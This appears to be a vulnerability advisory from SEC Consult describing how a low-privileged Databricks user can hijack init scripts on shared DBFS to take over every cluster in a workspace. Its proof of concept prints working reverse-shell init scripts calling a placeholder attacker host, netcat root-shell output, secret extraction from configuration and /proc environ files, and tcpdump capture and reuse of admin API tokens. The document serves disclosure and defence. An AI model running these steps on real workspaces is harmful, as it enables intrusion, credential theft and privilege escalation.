Vendor description
"Databricks Data Science & Engineering (sometimes called simply "Workspace") is an analytics platform based on Apache Spark. It is integrated with Azure to provide one-click setup, streamlined workflows, and an interactive workspace that enables collaboration between data engineers, data scientists, and machine learning engineers."
Source: https://learn.microsoft.com/en-us/azure/databricks/scenarios/what-is-azure-databricks-ws
Business recommendation
The vendor disabled legacy global init scripts and migrated cluster-scoped init scripts from DBFS to WSFS. Affected customers received migration instructions.
SEC Consult highly recommends a thorough security review of the product by security professionals to identify and resolve potential further security issues.
Florian Roth and Marius Bartholdy, security researchers at SEC Consult, have also written a blog post in collaboration with Elia Florio, Sr. Director of Detection & Response at Databricks. It can be found here:
https://r.sec-consult.com/databr
Furthermore, a proof-of-concept demo video has been published on YouTube:
https://r.sec-consult.com/dbyoutube
Databricks concepts
Concept 1: Databricks File System (DBFS)
"The Databricks File System (DBFS) is a distributed file system mounted into a Databricks workspace and available on Databricks clusters. DBFS is an abstraction on top of scalable object storage that maps Unix-like filesystem calls to native cloud storage API calls."
Source: https://docs.databricks.com/dbfs/index.html
This lets developers handle files as if they were local to a compute cluster, although they actually reside in cloud storage.
The recommended way to interact with DBFS from within a notebook is to use the Databricks Utilities (dbutils). The following command lists the content of a directory:
display(dbutils.fs.ls("dbfs:/databricks/scripts"))
For further information see: https://learn.microsoft.com/en-us/azure/databricks/dbfs/
Concept 2: Init Scripts
Databricks uses a feature called "init scripts" to customize compute clusters. These are shell scripts that run during the startup of each cluster and can be used, for example, to install dependencies or to configure advanced network settings.
There are different types of init scripts:
(I) Cluster-scoped init scripts only run on the specified cluster and have to be set up by the cluster owner. Before a cluster-scoped script can be used, it has to be uploaded to DBFS. It is then referenced in the cluster configuration by its file path, e.g. dbfs:/databricks/scripts/init-health-check.sh
(II) Global init scripts run on every cluster and have to be configured by an administrative user. Their storage location is not disclosed.
(III) Legacy global init scripts are nominally deprecated. However, they are still enabled by default, even on newly created workspaces. The main difference from the newer global init scripts is that they are stored on DBFS in a fixed location: dbfs:/databricks/init.
For further information see: https://learn.microsoft.com/en-us/azure/databricks/clusters/init-scripts
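Because both cluster-scoped (I) and legacy global (III) init scripts live on DBFS, their type can be roughly inferred from the path alone. The following is a minimal sketch of such a check, assuming the paths have already been listed (for example with dbutils.fs.ls). `classify_init_script` is a hypothetical helper, not part of any Databricks API. A .sh file elsewhere on DBFS is only a candidate: whether a cluster actually references it is visible only in that cluster's configuration.

```python
# Hypothetical audit helper (not a Databricks API): label DBFS paths by the
# init-script type they may correspond to, using the locations described above.
# Assumption: paths are "dbfs:/..." URIs, e.g. collected from dbutils.fs.ls().

LEGACY_GLOBAL_DIR = "dbfs:/databricks/init/"


def classify_init_script(path: str) -> str:
    """Return a coarse label for what kind of init script `path` might be."""
    if path.startswith(LEGACY_GLOBAL_DIR):
        # Fixed location of legacy global init scripts: runs on every cluster
        return "legacy global init script"
    if path.startswith("dbfs:/") and path.endswith(".sh"):
        # Any shell script on DBFS may be referenced by some cluster's config
        return "possible cluster-scoped init script"
    return "other"


if __name__ == "__main__":
    for p in (
        "dbfs:/databricks/init/global-init.sh",
        "dbfs:/databricks/scripts/init-health-check.sh",
        "dbfs:/databricks/scripts/notes.txt",
    ):
        print(f"{p} -> {classify_init_script(p)}")
```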
Vulnerability overview/description
1) Bypassing cluster isolation through insecure defaults and shared storage
A low-privileged user is able to break the isolation between Databricks compute clusters and take over any cluster in a workspace, as long as they are allowed to run notebooks. Due to an insecure default configuration combined with insufficient access control, it is possible to gain remote code execution on all clusters of a workspace. With such access, it is possible to leak secrets and to escalate privileges to those of a workspace administrator.
Attack scenario:
The DBFS is accessible by every user in a Databricks workspace. All files stored here are visible to anyone in the workspace. Cluster-scoped and legacy global init scripts are stored here. An authenticated attacker with the lowest possible permissions in a Databricks workspace could run a notebook to:
- Find and modify an existing cluster-scoped init script.
- Place a new script in the default location for legacy global init scripts.
Both attacks lead to a takeover of the compute cluster resources and enable further attacks. First, any stored secrets can be read; second, workspace administrator tokens can be stolen, as demonstrated by Joosua Santasalo from Secureworks.
See: https://www.databricks.com/blog/2022/10/10/admin-isolation-shared-clusters.html
Proof of concept
1) Bypassing cluster isolation through insecure defaults and shared storage
a) Preparations
For this POC, a new Azure Databricks workspace was created with the "Premium" pricing tier. It includes an administrative user (databricks-workspace-admin) as well as a newly added low-privileged user (databricks-user) with the default permissions "Workspace access" and "Databricks SQL access". These are the fewest possible permissions a user can have.
To demonstrate both attack scenarios, three clusters were created:
- Cluster 1: the databricks-user has permissions to run notebooks on it ("Can attach to")
- Cluster 2: owned by the databricks-workspace-admin, with a cluster-scoped init script already configured
- Cluster 3: owned by the databricks-workspace-admin, without an init script
The databricks-user does not have access to clusters 2 and 3 and cannot even see them in the portal.
For cluster 2 (with a pre-configured init script), the databricks-workspace-admin used the following notebook code to create an init script that simply writes example output to /tmp/init-health-check-success.txt:
dbutils.fs.mkdirs("dbfs:/databricks/scripts/")
# write a harmless init script that records a success message on the node
dbutils.fs.put("/databricks/scripts/init-health-check.sh", """#!/bin/bash
echo 'Init health check: successful' > /tmp/init-health-check-success.txt
""", True)
display(dbutils.fs.ls("dbfs:/databricks/scripts/init-health-check.sh"))
After that the script was applied to cluster 2 as a cluster-scoped init script.
To show the impact of this attack more tangibly, an Azure Key Vault-backed secret scope and a Databricks-backed secret scope were also created. Their secrets were then referenced in the Spark configuration and in the environment variables of clusters 2 and 3.
Spark configuration:
databricks-backed-secret {{secrets/databricks-backed-secret-scope/databricks-backed-secret}}
azure-keyvault-backed-secret {{secrets/key-vault-backed-secret-scope/azure-keyvault-backed-secret}}
Environment variables:
databricks_backed_secret_in_environment={{secrets/databricks-backed-secret-scope/databricks-backed-secret-in-environment}}
azure_keyvault_backed_secret_in_environment={{secrets/key-vault-backed-secret-scope/azure-keyvault-backed-secret-in-environment}}
These serve only as examples. On a real production compute cluster, such secrets could be used to connect to additional cloud storage, as described here:
https://learn.microsoft.com/en-us/azure/databricks/external-data/azure-storage#--access-azure-data-lake-storage-gen2-or-blob-storage-using-oauth-20-with-an-azure-service-principal
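The `{{secrets/...}}` placeholders in the Spark configuration and environment variables above are resolved on the cluster itself, so the configuration tells which secrets end up on a given cluster. A small inventory sketch, assuming the configuration is available as plain text; `parse_secret_refs` is a hypothetical helper name, and the regular expression simply mirrors the reference format shown above.

```python
import re

# Secret references use the form {{secrets/<scope-name>/<secret-name>}},
# as in the Spark configuration and environment variables above.
SECRET_REF = re.compile(r"\{\{secrets/([^/{}]+)/([^/{}]+)\}\}")


def parse_secret_refs(config_text: str) -> list[tuple[str, str]]:
    """Return (scope, secret) pairs for every secret reference in config_text."""
    return SECRET_REF.findall(config_text)


if __name__ == "__main__":
    env_line = (
        "databricks_backed_secret_in_environment="
        "{{secrets/databricks-backed-secret-scope/"
        "databricks-backed-secret-in-environment}}"
    )
    print(parse_secret_refs(env_line))
```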
b) Attack via pre-existing init script
The attacker starts by viewing the content of the DBFS with the following code:
display(dbutils.fs.ls("dbfs:/databricks"))
display(dbutils.fs.ls("dbfs:/databricks/scripts"))
All .sh files found there could be cluster-scoped init scripts applied to clusters the attacker is not aware of. Existing scripts cannot be overwritten, but they can be renamed or deleted. Since the cluster configuration only references a script by its file path, a newly created script with the same name will be executed instead. Such a malicious file was created. It contains a reverse shell that continually attempts to connect to the attacker's server.
# rename file
dbutils.fs.mv("/databricks/scripts/init-health-check.sh",
"/databricks/scripts/init-health-check.sh.old")
#write new file with malicious content
dbutils.fs.put("/databricks/scripts/init-health-check.sh","""
#!/bin/bash
crontab -l > mycron
echo "* * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/$ATTACKER/8091 0>&1'" >> mycron
crontab mycron
rm mycron
""", True)
As soon as the init script runs again, for example after a cluster restart, a reverse shell connection with root privileges on the compute cluster is received:
user@$ATTACKER:~$ nc -lnkvp 8091
Listening on [0.0.0.0] (family 0, port 8091)
Connection from $TARGET 48518 received!
bash: cannot set terminal process group (21384): Inappropriate ioctl for device
bash: no job control in this shell
root@0121-110521-h6l5h1n2-10-139-64-5:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@0121-110521-h6l5h1n2-10-139-64-5:~# uname -a
uname -a
Linux 0121-110521-h6l5h1n2-10-139-64-5 5.4.0-1090-azure #95~18.04.1-Ubuntu SMP Sun Aug 14 20:09:27 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
root@0121-110521-h6l5h1n2-10-139-64-5:~#
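Since the cluster configuration references an init script only by its path, a replaced file with the same name runs without any visible change to the cluster itself. One possible detective control, sketched here under the assumption that the cluster owner records a SHA-256 digest of the approved script and can read the current content as bytes (how it is fetched is left open), is to compare the two before trusting a restart. The helper names are hypothetical, and this detects tampering after the fact rather than preventing it.

```python
import hashlib


def sha256_hex(content: bytes) -> str:
    """Hex-encoded SHA-256 digest of a script's content."""
    return hashlib.sha256(content).hexdigest()


def script_unchanged(current: bytes, approved_sha256: str) -> bool:
    """True if the current script content matches the recorded digest."""
    return sha256_hex(current) == approved_sha256.lower()


if __name__ == "__main__":
    approved = (
        b"#!/bin/bash\n"
        b"echo 'Init health check: successful' > /tmp/init-health-check-success.txt\n"
    )
    digest = sha256_hex(approved)  # recorded when the script was approved
    print(script_unchanged(approved, digest))                       # True
    print(script_unchanged(approved + b"echo modified\n", digest))  # False
```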
c) Attack via legacy global init script
Legacy global init scripts are enabled by default, so an attacker can assume they are turned on and place a script in the default location at dbfs:/databricks/init.
dbutils.fs.mkdirs("dbfs:/databricks/init/")
dbutils.fs.put("dbfs:/databricks/init/global-init.sh", """
#!/bin/bash
crontab -l > mycron
echo "* * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/$ATTACKER/8091 0>&1'" >> mycron
crontab mycron
rm mycron
""", True)
Legacy global init scripts apply to every compute cluster in the workspace. Every cluster now establishes a reverse shell as soon as the script is triggered again. This makes it possible to attack compute clusters even if they do not have a cluster-scoped init script configured.
user@$ATTACKER:~$ nc -lnkvp 8091
Listening on [0.0.0.0] (family 0, port 8091)
Connection from $TARGET 53910 received!
bash: cannot set terminal process group (988): Inappropriate ioctl for device
bash: no job control in this shell
root@0121-111747-cmijb28n-10-139-64-4:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@0121-111747-cmijb28n-10-139-64-4:~# uname -a
uname -a
Linux 0121-111747-cmijb28n-10-139-64-4 5.4.0-1100-azure #106~18.04.1-Ubuntu SMP Mon Dec 12 21:49:35 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
root@0121-111747-cmijb28n-10-139-64-4:~#
Impact
a) Leaking sensitive information in environment variables and the configuration
Secrets configured in the keyvault-backed secret scope can only be retrieved at runtime by the compute instance itself via a managed identity. Even Databricks workspace administrators cannot read them directly. They are however available to the compute cluster as soon as it is initialized. With remote code execution and root privileges an attacker is able to read the plain text secrets of any cluster.
Spark configuration secrets can be found at /tmp/custom-spark.conf:
root@0121-111747-cmijb28n-10-139-64-4:/tmp# cat custom-spark.conf
cat custom-spark.conf
spark.databricks.unityCatalog.enforce.permissions false
spark.driver.host 10.139.64.6
spark.databricks.secret.envVar.keys.toRedact ZGF0YWJyaWNrc19iYWNrZWRfc2VjcmV0X2luX2Vudmlyb25tZW50,YXp1cmVfa2V5dmF1bHRfYmFja2VkX3NlY3JldF9pbl9lbnZpcm9ubWVudA==
spark.driver.tempDirectory /local_disk0/tmp
spark.databricks.delta.preview.enabled true
spark.databricks.wsfsPublicPreview true
databricks-backed-secret databricks-backed-secret-value <- THIS IS A SECRET
spark.databricks.secret.sparkConf.keys.toRedact ZGF0YWJyaWNrcy1iYWNrZWQtc2VjcmV0,YXp1cmUta2V5dmF1bHQtYmFja2VkLXNlY3JldA==
spark.databricks.mlflow.autologging.enabled true
spark.executor.tempDirectory /local_disk0/tmp
spark.databricks.enablePublicDbfsFuse false
spark.databricks.workspaceUrl adb-8690126810713062.2.azuredatabricks.net
spark.master local[*, 4]
azure-keyvault-backed-secret azure-keyvault-backed-secret-value <- THIS IS A SECRET
spark.databricks.cloudfetch.hasRegionSupport true
spark.databricks.unityCatalog.enabled true
spark.databricks.automl.serviceEnabled true
spark.databricks.cluster.profile singleNode
root@0121-111747-cmijb28n-10-139-64-4:/tmp#
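The two *.toRedact entries above are comma-separated base64 strings. Decoding them shows that they only hold the names of the secret-backed keys (presumably so that Databricks can mask these values elsewhere, which is an assumption), while the values themselves appear in plain text in the same file. A minimal sketch using only the standard library; `decode_redaction_keys` is a hypothetical helper name.

```python
import base64


def decode_redaction_keys(value: str) -> list[str]:
    """Decode a comma-separated list of base64-encoded key names."""
    return [base64.b64decode(item).decode("utf-8") for item in value.split(",") if item]


if __name__ == "__main__":
    spark_conf_keys = (
        "ZGF0YWJyaWNrcy1iYWNrZWQtc2VjcmV0,"
        "YXp1cmUta2V5dmF1bHQtYmFja2VkLXNlY3JldA=="
    )
    print(decode_redaction_keys(spark_conf_keys))
    # ['databricks-backed-secret', 'azure-keyvault-backed-secret']
```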
To read secrets in the environment variables, an attacker needs to access the environment of the process that holds them. With root privileges, they can access every process's environment by reading the corresponding /proc/<process-id>/environ file. For simplicity, the relevant process ID (888) was used directly in this POC:
root@0121-110521-h6l5h1n2-10-139-64-5:~# cat /proc/888/environ
SHELL=/bin/bash[...]
TERM=xterm-256color
USER=root
SPARK_PUBLIC_DNS=10.139.64.6
azure_keyvault_backed_secret_in_environment=
azure-keyvault-backed-secret-in-envionment-value <- THIS IS A SECRET
SPARK_LOCAL_DIRS=/local_disk0SHLVL=1
MASTER=local[4]
SPARK_HOME=/databricks/spark
SPARK_LOCAL_IP=10.139.64.6
MLFLOW_CONDA_HOME=/databricks/conda
CLASSPATH=/databricks/spark/dbconf/jets3t/:/databricks/spark/dbconf/log4j/driver:/databricks/hive/conf:/databricks/spark/dbconf/hadoop:/databricks/jars/*
SPARK_CONF_DIR=/databricks/spark/conf
SPARK_DIST_CLASSPATH=/databricks/spark/dbconf/log4j/driver:/databricks/jars/*
PYENV_ROOT=/databricks/.pyenv
DATABRICKS_LIBS_NFS_ROOT_PATH=/local_disk0/.ephemeral_nfs
SPARK_ENV_LOADED=1
DATABRICKS_CLUSTER_LIBS_ROOT_DIR=cluster_libraries
PATH=/databricks/.pyenv/bin:/usr/local/nvidia/bin:/databricks/python3/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
DATABRICKS_LIBS_NFS_ROOT_DIR=.ephemeral_nfsSUDO_UID=0
DATABRICKS_CLUSTER_LIBS_PYTHON_ROOT_DIR=python
SPARK_SCALA_VERSION=2.12
MAIL=/var/mail/root
databricks_backed_secret_in_environment=
database-backed-secret-in-environment-value <- THIS IS A SECRET
SCALA_VERSION=2.10PTY_LIB_FOLDER=/usr/lib/libptyOLDPWD=/databricks/chauffeurSPARK_WORKE
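/proc/<pid>/environ stores KEY=VALUE entries separated by NUL bytes rather than newlines, which is most likely why some entries in the output above run together (for example SPARK_LOCAL_DIRS=/local_disk0SHLVL=1). A minimal parser for that format; `parse_environ` is a hypothetical helper name, and the sample input reproduces that fused entry with its separator restored.

```python
def parse_environ(raw: bytes) -> dict[str, str]:
    """Parse the NUL-separated KEY=VALUE records of a /proc/<pid>/environ file."""
    env: dict[str, str] = {}
    for record in raw.split(b"\0"):
        if not record:
            continue  # skip the empty piece after the trailing NUL
        key, sep, value = record.partition(b"=")
        if sep:  # ignore malformed records without "="
            env[key.decode(errors="replace")] = value.decode(errors="replace")
    return env


if __name__ == "__main__":
    sample = b"SPARK_LOCAL_DIRS=/local_disk0\0SHLVL=1\0"
    print(parse_environ(sample))
    # {'SPARK_LOCAL_DIRS': '/local_disk0', 'SHLVL': '1'}
```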
b) API Token leak and privilege escalation
Using a vulnerability initially found by Joosua Santasalo from Secureworks, it is possible to leak Databricks API tokens of other users, including administrators. The hardening measure proposed at the time, "Use cluster types that support user isolation wherever possible.", does not mitigate this, because our new vulnerability affects all compute cluster types.
Source: https://www.databricks.com/blog/2022/10/10/admin-isolation-shared-clusters.html
It is thereby possible to impersonate any user and to gain privileges of a workspace administrator.
Using the previously established reverse shell, control-plane traffic can be captured with the following command. As soon as the administrative user starts a task, for example by running a simple notebook, the token is sent unencrypted and can be captured.
(When reproducing the issue via the global init script attack vector, make sure you are on the correct cluster: the low-privileged user's own cluster is compromised as well and also connects back with a shell. This confused us more often than we would like to admit.)
root@0121-110521-h6l5h1n2-10-139-64-5:~# /usr/sbin/tcpdump -i any -Aq | grep -i 'apiToken'
/usr/sbin/tcpdump -i any -Aq | grep -i 'apiToken'
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on any, link-type LINUX_SLL (Linux cooked v1), capture size 262144 bytes
{"apiToken":"dkea****************************a107","procStartTime":53444,"commandOrigin":"PythonDriver","commandId":"7712608268853321788_7012126414451989966_5680a35d486f42ac922d461b93b8b7bf","notebookDir":"/Users/databricks-workspace-admin@redacted.onmicrosoft.com"}
apiToken
{"apiToken":"dkea****************************a107","procStartTime":85732,"commandOrigin":"PythonWorker","commandId":"7712608268853321788_7012126414451989966_5680a35d486f42ac922d461b93b8b7bf","notebookDir":"/Users/databricks-workspace-
. . .
This apiToken can then be used with the Databricks CLI or directly with the REST API. The following example request requires administrative privileges to succeed:
└─$ curl -s adb-redacted.2.azuredatabricks.net/api/2.0/secrets/scopes/list -H 'Authorization: Bearer dkea****************************a107' | jq
{
"scopes": [
{
"name": "databricks-backed-secret-scope",
"backend_type": "DATABRICKS"
},
{
"name": "key-vault-backed-secret-scope",
"backend_type": "AZURE_KEYVAULT",
"keyvault_metadata": {
"resource_id": "/subscriptions/714984c7-3ed0-4de2-b23b-9cffd28b74f7/resourceGroups/rg-databricks-proof-of-concept/providers/Microsoft.KeyVault/vaults/redacted-databricks-poc",
"dns_name": "https://redacted-databricks-poc.vault.azure.net/"
}
}
]
}
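The response of the secrets/scopes/list endpoint is a JSON object with a "scopes" array, as shown above. A short sketch that reduces it to scope names and backend types, which makes it easy to see, for instance, which scopes are backed by Azure Key Vault. `summarize_scopes` is a hypothetical helper, and the sample is an abbreviated copy of the response above.

```python
import json


def summarize_scopes(response_text: str) -> dict[str, str]:
    """Map each secret scope name to its backend type."""
    data = json.loads(response_text)
    return {scope["name"]: scope["backend_type"] for scope in data.get("scopes", [])}


if __name__ == "__main__":
    sample = """
    {"scopes": [
        {"name": "databricks-backed-secret-scope", "backend_type": "DATABRICKS"},
        {"name": "key-vault-backed-secret-scope", "backend_type": "AZURE_KEYVAULT"}
    ]}
    """
    print(summarize_scopes(sample))
```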
Once RCE is achieved, additional scenarios are possible, for example using the managed identity of the compute clusters to obtain an access token from the instance metadata service at http://169.254.169.254/metadata/identity/oauth2/token.
Vulnerable / tested versions
The latest Databricks PaaS offering was tested on Azure as well as Amazon Web Services (AWS) with the "Premium" pricing tier as of 2023-01-26.